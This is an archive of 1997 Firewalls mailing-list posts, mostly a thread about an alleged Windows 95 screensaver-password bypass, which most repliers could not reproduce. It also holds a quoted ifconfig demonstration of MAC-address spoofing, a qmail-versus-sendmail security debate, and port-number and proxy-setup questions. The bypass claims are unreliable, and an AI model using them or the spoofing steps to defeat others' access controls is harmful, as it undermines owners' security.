Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I guess you could classify this as a security bug, but whoa is anyone who relies on the screen saver for any type of security. >---------- >From: PaLaN[SMTP:palan@dataprep.com.my] >Sent: Tuesday, January 14, 1997 5:56 PM >To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU >Subject: WIN'95 FLAW > >Howdy, > >I juz encountered a security (i would call it) flaw in M$ Windows'95 >screensaver !! I don't know anyone of you encountered this or not but here >it goes : > >If the Windows'95 Screen saver is active, you can break into without any >password and all you have to do is : press the "windows" logo key (printed >on the M$ keyboard) and there you are. > >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have >tried this with my own PC and my friends. It works.....try on your own PC. > >Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here >ok..! Let me know if anyone of you encountered this. > >I'm goin to send M$ a mail on this bug but before that, I need to know >whether any patch available for this...thx. > > >rgds, >PaLaN > > > From firewalls-owner Tue Jan 14 10:38:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03386 for firewalls-outgoing; Tue, 14 Jan 1997 07:10:19 -0800 (PST) Received: from eagle.anheuser-busch.com ([151.145.250.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03331 for ; Tue, 14 Jan 1997 07:09:44 -0800 (PST) Received: (from smap@localhost) by eagle.anheuser-busch.com (8.7.5/8.6.12) id JAA06318 for ; Tue, 14 Jan 1997 09:03:30 -0600 (CST) Received: from stlabcexg001.anheuser-busch.com(151.145.101.151) by eagle.anheuser-busch.com via smap (V1.3) id sma006315; Tue Jan 14 09:03:24 1997 Received: by stlabcexg001.anheuser-busch.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC01FA.911A8F60@stlabcexg001.anheuser-busch.com>; Tue, 14 Jan 1997 09:08:54 -0600 Message-ID: From: "Starkweather, Mike" To: "'firewalls@GreatCircle.COM'" Subject: RE: WIN'95 FLAW Date: Tue, 14 Jan 1997 09:08:58 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I tried setting up a password protected screen saver on a Windows 95 machine here. Once the screen saver activated I was not able to find any key combination (using alt, shift, ctrl, tab and esc) that would bypass the password check. ms ---------- From: PaLaN[SMTP:palan@dataprep.com.my] Sent: Tuesday, January 14, 1997 4:56 PM To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU Subject: WIN'95 FLAW Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 10:41:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA02679 for firewalls-outgoing; Tue, 14 Jan 1997 06:58:44 -0800 (PST) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA02672 for ; Tue, 14 Jan 1997 06:58:27 -0800 (PST) Received: by brimstone.rnb.com; id JAA25764; Tue, 14 Jan 1997 09:58:18 -0500 (EST) Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma025695; Tue, 14 Jan 97 09:58:02 -0500 Received: from monarch (monarch [150.1.33.146]) by relay.rnb.com (8.8.4/8.8.4) with SMTP id JAA13153; Tue, 14 Jan 1997 09:58:01 -0500 (EST) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified. Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 14 Jan 1997 09:57:03 -0500 (EST) From: Ken Kempster X-Sender: kempster@monarch To: Pilar Lavin Mera cc: firewalls@greatcircle.com Subject: Re: TIS FWtk + netscape In-Reply-To: <199701141117.MAA08544@hydra.crisa.es> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, Pilar Lavin Mera wrote: > Hello all, > > I'm new in this class of list and i don't know if my question is or not appropiated, but ... i would appreciate any help. > > My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit. > Our problem is that we cannot configure netscape to pass through the ftp-proxy. > Can anyone help us? Netscape utilizes the anonymous ftp capabilities of the http proxy; the ftp-gw is for command line ftp. in your netscape proxy config. you should have your firewall name and port 80 for the http, ftp, gopher and security proxy lines; given that your http-gw is configured for the default port of 80 otherwise 80 would be whatever port it is configured for. > > Thanks in advance, > Pilar. > plavin@crisa.es > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _ _ | | Republic National Bank (.)-(.) | | (6 6) | | =\o/= | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~m~~~m~~~~~~~~~~~~~~ From firewalls-owner Tue Jan 14 10:43:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA02233 for firewalls-outgoing; Tue, 14 Jan 1997 06:46:10 -0800 (PST) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA02204 for ; Tue, 14 Jan 1997 06:45:55 -0800 (PST) Received: by brimstone.rnb.com; id JAA22345; Tue, 14 Jan 1997 09:45:41 -0500 (EST) Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma022239; Tue, 14 Jan 97 09:45:14 -0500 Received: from monarch (monarch [150.1.33.146]) by relay.rnb.com (8.8.4/8.8.4) with SMTP id JAA12894; Tue, 14 Jan 1997 09:45:13 -0500 (EST) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified. Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 14 Jan 1997 09:44:15 -0500 (EST) From: Ken Kempster X-Sender: kempster@monarch To: Todd Graham Lewis cc: Firewalls Mailing List Subject: Re: Ethernet hardware addresses In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 13 Jan 1997, Todd Graham Lewis wrote: > This has been pointed out before, but I thought that I'd pass this along > to the list to reinforce how worthless ethernet MAC addresses are. > > Most (virtually all) ethernet cards allow one to reprogram what MAC > address it uses. The ioctl under Linux is SIOCSIFHWADDR, for "set > hardware address". I was going to write my own program to do it, and > while doing research for that, I discovered that it's already built into > the standard ifconfig for Linux. > > (If you want to write your own, just search for SIOCSIFHWADDR in > ifconfig.c. The code is really simple; just an ioctl.) > > To demonstrate how easy this is to do, watch how long it took me: > > (output edited; these are the commands and the interesting output) > > reflections# ifconfig eth0 > eth0 Link encap:10Mbps Ethernet HWaddr 00:A0:24:81:A7:44 > reflections# ifconfig eth0 down > reflections# ifconfig eth0 hw ether 00:A0:24:81:A7:45 > reflections# ifconfig eth0 > eth0 Link encap:10Mbps Ethernet HWaddr 00:A0:24:81:A7:45 Is this a perm. change. I was under the impression that the MAC address was burned in at the factory. Will it revert back to its' origional address after a reboot? > > Again, if you are using MAC addresses for anything more than _very_ > trivial authentication, be aware that any user under virtually any > operating system can do what I just did in three commands. If you want > real security, use Kerberos or some other appropriate cryptosystem. > > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 > > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _ _ | | Republic National Bank (.)-(.) | | (6 6) | | =\o/= | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~m~~~m~~~~~~~~~~~~~~ From firewalls-owner Tue Jan 14 10:45:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA01885 for firewalls-outgoing; Tue, 14 Jan 1997 06:38:01 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA01869 for ; Tue, 14 Jan 1997 06:37:48 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id JAA19291; Tue, 14 Jan 1997 09:35:09 -0500 From: Adam Shostack Message-Id: <199701141435.JAA19291@homeport.org> Subject: Re: Secure firewall with only Linux-Kernel filtering possible? In-Reply-To: <199701140929.EAA18347@homeport.org> from Darren Reed at "Jan 14, 97 08:32:06 pm" To: avalon@coombs.anu.edu.au (Darren Reed) Date: Tue, 14 Jan 1997 09:35:09 -0500 (EST) Cc: firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed wrote: | I don't want to throw cold water of the qmail authors' enthusiasm, but | a reality check on this comparison seems needed. It is excellent to see | someone is doing this but I can't see sendmail fading out the picture | any time soon. I'm not qmails author, Dan Bernstein is. My point in posting that was to encourage people to look at qmail, since I feel that it is a substantial win over sendmail, especially in a security context, such as a firewall. | In some mail from Adam Shostack, sie said: | > | > qmail sendmail | > ----- -------- | > 210k tar.gz 900k tar.gz | | how many lines of code ? 16k for qmail, 46k for sendmail (wc *.[ch]) Throwing more water on the comparison, the code in sendmail is easier to review; Dan has done some work on a C library replacement, and while I think its an admirable effort, it does make looking through the code more difficult. | the sendmail .tar.gz comes with a _lot_ of other things such as scripts | for easy building of sendmail.cf, sample sendmail.cf's, etc. | | > one setuid (qmail) one (root) setuid program | | one setuid program is one too many. Its an argruable point. I agree, but its set up that way so that only one component (qmail-queue) can write to the message queue. I know you're familiar with the risks involved in a world writable directory. Also, qmail-queue is setuid qmailq, not setuid root. | > designed for security designed to handle complex mail, | > like uucp/smtp/chaos | | I'm sure others *must* have asked this question: how do you use sendmail | in conjunction with qmail so you can handle all the various complexities | which are found in today's Internet ? qmail does smtp routing. It can support delivering mail via uux. One of the projects I'm working on is putting sendmail into a firewall environment with sendmail on the inside of the network (to support complexity that I feel qmail could handle; I don't want to fight the battle to get qmail on the inside. I want to fight the battle to get sendmail out of a security critical context.) | > many small confusing one famously painful config file | > config files | | "famously painful" - it is _much_ better than it was. Personally, I would | prefer to have one config file (the FWTK has one - netperm-table - but many | small programs) rather than try configure many things to interact correctly. | | Why doesn't someone write a sendmail.cf -> qmail configuration converter | and then compare ? Mostly because most of the complex things for sendmail (eg, virtual domaining) are simple in qmail. | > release of the month club bug of the month club | > (soon to hit v1.0) | | bug of the month/release of the month - which do you go for ? | They're both bad (but could be worse). It does mean they both | receive attention which is good. I have no question which I go for. Bug of the month demands instant attention. Release of the month does not. | Not being v1.0 means, to me, it is a young product that has a long way to | go before it matures. Yep. | > (no security holes) | | Correction: no known security holes (yet). You cut my line about hubris. Its my expectation that qmail security holes will not be on the order of sendmail holes. I'm willing to bet on it, even without having reviewed the qmail source. By that I mean that no one will obtain root privledges with qmail from either on the internet talking to your smtp port (excepting inetd), and no one will exploit qmail's binaries to get root privledges once they have a shell on your machine. Why? Because qmail is designed so one program has one function. The smtpd path has no components that run as root. The local binaries are not setuid, and you have to convolute to get it to deliver mail to the root account (if you can. I'm happy to deliver all my root mail to adam+root. Saves me the trouble of su'ing to read a mailbox.) So, even as a young product, I think its designed right, and that right design offers a huge amount of protection. Again, I urge everyone to take a look. www.qmail.org. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Jan 14 11:47:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA04814 for firewalls-outgoing; Tue, 14 Jan 1997 07:42:12 -0800 (PST) Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA04799 for ; Tue, 14 Jan 1997 07:41:51 -0800 (PST) Received: from ftp.com by ftp.com ; Tue, 14 Jan 1997 09:47:37 -0500 Received: from mailserv-2high.ftp.com by ftp.com ; Tue, 14 Jan 1997 09:47:37 -0500 Received: from ascend.ftp.com by MAILSERV-2HIGH.FTP.COM (SMI-8.6/SMI-SVR4) id JAA19957; Tue, 14 Jan 1997 09:47:39 -0500 Message-Id: <199701141447.JAA19957@MAILSERV-2HIGH.FTP.COM> X-Mapi-Messageclass: IPM Read-Receipt-To: Shishir Belbase To: blitton@directs.com Cc: firewalls@GreatCircle.com X-Mailer: FTP Software Internet Mail 2.0 Mime-Version: 1.0 From: Shishir Belbase Subject: RE: Question Date: Tue, 14 Jan 1997 09:54:02 -0500 Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Reply to your message of 1/13/97 11:14 PM >> Can someone please tell me where I can find a list of port numbers = and=20 >> process assigned to it. ie port 80 =3D> http, port 443 =3D> shttp. Check the /ETC/SERVICES file of pretty much any tcp/ip kernel and you shoul= d have the port numbers and the programs that use it. Or any other TC/IP b= ook. =20 >> I am especially interested in what port number is assigned to snmp. =09 snmp 161 snmp-trap 162 Chao !! - Shishir Belbase From firewalls-owner Tue Jan 14 12:02:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA04594 for firewalls-outgoing; Tue, 14 Jan 1997 07:31:58 -0800 (PST) Received: from burke.burkegroup.com (burke.roc.servtech.com [206.106.148.165]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA04546 for ; Tue, 14 Jan 1997 07:31:21 -0800 (PST) From: dan@burkegroup.com Received: from Connect2 Message Router by burke.burkegroup.com via Connect2-SMTP 4.00; Tue, 14 Jan 97 10:31:37 -0500 Message-ID: <88C4AA3101523000@burke.burkegroup.com> Date: Tue, 14 Jan 97 10:30:40 -0500 Organization: Burke Group To: firewalls@greatcircle.com, sneakers@cs.yale.edu Subject: Re: WIN'95 FLAW MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is unreproducible on my machine as well. (Win 95 w/ SP 1 (I think?) Pressing Windows key or Alt-Esc brings up password dialog. > To: PALAN@INET (PaLaN) {palan@dataprep.com.my} > Copies-to: FIREWALL@INET {firewalls@greatcircle.com}, > SNEAKERS@INET {sneakers@CS.YALE.EDU} > From: GUNNI@INET (Gunnar Ingvi Thorisson) {gunni@if.is} > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). > > Gunni > gunni@if.is > gunni@coda.is > From firewalls-owner Tue Jan 14 12:18:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03504 for firewalls-outgoing; Tue, 14 Jan 1997 07:12:33 -0800 (PST) Received: from kcpgw2.kcp.com (kcpgw2.kcp.com [198.62.69.67]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA03451 for ; Tue, 14 Jan 1997 07:11:57 -0800 (PST) From: dharris@kcp.com Message-Id: <199701141511.HAA03451@miles.greatcircle.com> Received: by kcpgw2.kcp.com id AA08327 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Tue, 14 Jan 1997 09:11:44 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-2); Tue, 14 Jan 1997 09:11:44 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-1); Tue, 14 Jan 1997 09:11:44 -0600 Mime-Version: 1.0 Date: Tue, 14 Jan 1997 09:05:34 -0600 Subject: Re: WIN'95 FLAW To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU, PaLaN Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With Win95Plus and the "Leonardo da Vinci" theme and screen saver this does not work IF you have created a user account (did not bypass the Win95 login screen) with the same password as used for the screen saver. Also, my system is part of an NT server's domain - this may also affect the protection provided by the screen saver. Delmer D. Harris dharris@kcp.com ______________________________ Reply Separator _________________________________ Subject: WIN'95 FLAW Author: PaLaN at INTERNET-MAIL Date: 1/14/97 2:56 PM Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 12:21:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA04199 for firewalls-outgoing; Tue, 14 Jan 1997 07:26:29 -0800 (PST) Received: from hawk.tml.co.za (hawk.tml.co.za [196.4.87.22]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA04177 for ; Tue, 14 Jan 1997 07:25:58 -0800 (PST) Received: from gavin.tml.co.za (gavin.tml.co.za [196.4.92.45]) by hawk.tml.co.za (8.6.12/8.6.12) with SMTP id RAA10585; Tue, 14 Jan 1997 17:27:30 -0200 Received: by gavin.tml.co.za with Microsoft Mail id <01BC0240.00EFA880@gavin.tml.co.za>; Tue, 14 Jan 1997 17:25:57 +0200 Message-ID: <01BC0240.00EFA880@gavin.tml.co.za> From: Gavin Ferreiro To: "'PaLaN'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: WIN'95 FLAW Date: Tue, 14 Jan 1997 17:25:54 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Palan, I am running Windows '95 and have installed all patches as recommended = by microsoft. As of this time I have even put a microsoft keyboard onto = my system and am unable to get past the password on the screen saver.=20 There are about 5 patches you need to get. There is one patch that has = to do with the security of '95. If you do not know how to get them send = me mail and I will attach them to you. Regards Gavin Ferreiro UNIX Consultant gavin@tml.co.za +27+11+280-5345 (Tel) +27+11+280-5350 (Fax) +27+83+265-2927 (Mobile) ---------- From: PaLaN[SMTP:palan@dataprep.com.my] Sent: 15 January 1997 12:56 To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU Subject: WIN'95 FLAW Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but = here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key = (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I = have tried this with my own PC and my friends. It works.....try on your own = PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ = here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 12:23:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03925 for firewalls-outgoing; Tue, 14 Jan 1997 07:19:43 -0800 (PST) Received: from eagle.anheuser-busch.com ([151.145.250.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03904 for ; Tue, 14 Jan 1997 07:19:17 -0800 (PST) Received: (from smap@localhost) by eagle.anheuser-busch.com (8.7.5/8.6.12) id JAA06547 for ; Tue, 14 Jan 1997 09:13:02 -0600 (CST) Received: from unknown(151.145.101.152) by eagle.anheuser-busch.com via smap (V1.3) id sma006538; Tue Jan 14 09:12:52 1997 Received: by stlabcexg002.anheuser-busch.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC01FB.E2E8FBF0@stlabcexg002.anheuser-busch.com>; Tue, 14 Jan 1997 09:18:21 -0600 Message-ID: From: "Starkweather, Mike" To: "'firewalls@GreatCircle.COM'" Subject: RE: Question Date: Tue, 14 Jan 1997 09:18:26 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I saw the following note in the newsgroup yesterday. It might help. ==================== According to Practical Unix & Internet Security (Garfinkel& Spafford, Apr 1996, p.934) 5510 is used by a protocol called "securidprop" described as "Security Dynamics ACE/Server slave." Cheers! Dave ... Dave Neuman, SSgt, 100CS/SCBBN Network Security Manager RAF Mildenhall, UK DSN Phone: 314-238-3860 CMCL Phone: +44-1638-543860 DSN Fax: 314-238-2504 CMCL Fax: +44-1638-542504 mailto:dave.neuman@mildenhall.af.mil >---------- >Hi > > does anyone know what tcp port 5510 is used for, or >where I can find it out? - it is not listed in rfc 1700. > ===================== ---------- From: blitton@directs.com[SMTP:blitton@directs.com] Sent: Monday, January 13, 1997 5:42 PM To: firewalls@GreatCircle.COM Subject: Question Can someone please tell me where I can find a list of port numbers and process assigned to it. ie port 80 => http, port 443 => shttp. I am especially interested in what port number is assigned to snmp. Thanks in advanced and sorry if this is out of topic. bruce From firewalls-owner Tue Jan 14 12:36:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA05804 for firewalls-outgoing; Tue, 14 Jan 1997 08:08:21 -0800 (PST) Received: from gabriel.advsys.com (gabriel.advsys.com [198.49.218.20]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA05790 for ; Tue, 14 Jan 1997 08:07:59 -0800 (PST) Received: from sting.advsys.com ([129.203.1.25]) by gabriel.advsys.com (8.8.4/8.8.4) with ESMTP id LAA31065 for ; Tue, 14 Jan 1997 11:12:31 -0500 (EST) Received: from geek.advsys.com (geek [129.203.1.22]) by sting.advsys.com (8.8.0/8.8.0) with ESMTP id LAA20455 for ; Tue, 14 Jan 1997 11:09:53 -0500 (EST) Received: (from gabrams@localhost) by geek.advsys.com (8.7/8.7) id LAA16644; Tue, 14 Jan 1997 11:10:31 -0500 (EST) From: "Gary O. Abrams" Message-Id: <199701141610.LAA16644@geek.advsys.com> Subject: Re: WIN'95 FLAW To: firewalls@greatcircle.com Date: Tue, 14 Jan 1997 11:10:30 -0500 (EST) In-Reply-To: from "Gary Hull" at Jan 14, 97 08:43:13 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >On Tue, 14 Jan 1997, PaLaN wrote: > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > We have not seen this problem on any of our in-house systems. I've also checked with a couple of our larger (Fortune 50) clients, and they're not experiencing it either. FYI, the systems referenced have SP1, and are clients of NT domains. -- Gary +-----------------------------------+ | Gary O. Abrams, President | | Advanced Systems Consulting, Inc. | | Marlton, NJ 08053 | | Email: gabrams@advsys.com | +-----------------------------------+ From firewalls-owner Tue Jan 14 13:39:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06765 for firewalls-outgoing; Tue, 14 Jan 1997 08:30:47 -0800 (PST) Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA06736 for ; Tue, 14 Jan 1997 08:30:14 -0800 (PST) Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.7.6/8.6.9) with SMTP id IAA23602; Tue, 14 Jan 1997 08:30:56 -0800 (PST) Date: Tue, 14 Jan 1997 08:28:44 -0800 (PST) From: Michael Baumann To: sklee cc: PaLaN , firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW In-Reply-To: <32DC40B0.18FB@hitel.kol.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok people, what do you expect when you run 16 bit code on a 32 bit OS? If you use one of the 32bit screensavers that ships with Win95, *NOT* one of the ones that came with windoze 3.11, you cannot do this. Yes, you can abort the system (reset) with the hardware or the power switch, but CTL-ALT-DEL or CTL-ESC, or the `windows` key will get you nothing. [ Oh, and can we drop this out of firewalls now please? ] On Tue, 14 Jan 1997, sklee wrote: > PaLaN wrote: > > > > Howdy, > > > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > rgds, > > PaLaN > > > Good !!!!! > > M$ is crazy boy..... > > I will try that screen saver start and i put Ctrl+Alt+Delete and > i kill screen saver ....that is killed...:-) > > This is great buggy!! > > sklee > -- Michael Baumann Optivus Technology Inc.|Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Tue Jan 14 13:48:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07804 for firewalls-outgoing; Tue, 14 Jan 1997 08:57:50 -0800 (PST) Received: from shoelace.FirstLink.com (shoelace.FirstLink.com [204.144.168.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA07797 for ; Tue, 14 Jan 1997 08:57:32 -0800 (PST) Received: (from kozubik@localhost) by shoelace.FirstLink.com (Nieusma) id JAA25006; Tue, 14 Jan 1997 09:56:46 -0700 (MST) Date: Tue, 14 Jan 1997 09:56:45 -0700 (MST) From: John Kozubik To: PaLaN cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk also, I am pretty sure you can just type ctrl-alt-del and just stop the task itself in the task manager. From firewalls-owner Tue Jan 14 13:50:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA08141 for firewalls-outgoing; Tue, 14 Jan 1997 09:06:28 -0800 (PST) Received: from io.org (io.org [198.133.36.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA08133 for ; Tue, 14 Jan 1997 09:06:18 -0800 (PST) Received: from psigurd.mkm.can.ibm.com (mpngt5.ny.us.ibm.com [198.133.29.68]) by io.org (8.8.3/8.6.12) with ESMTP id MAA08272; Tue, 14 Jan 1997 12:05:15 -0500 (EST) Message-ID: <32DBBCEF.6053@io.org> Date: Tue, 14 Jan 1997 12:05:51 -0500 From: Peter Sigurdson Reply-To: psigurd@io.org X-Sender: Peter Sigurdson (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: Pilar Lavin Mera CC: firewalls@GreatCircle.COM Subject: Re: TIS FWtk + netscape X-Priority: Normal References: <199701141117.MAA08544@hydra.crisa.es> Content-Type: multipart/alternative; boundary="----------50A6E9754814" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------50A6E9754814 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii In the security menu, you should configure the proxy box with the name of your socks server. ------------50A6E9754814 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
In the security menu, you should configure the proxy box with the name of your        socks server. 
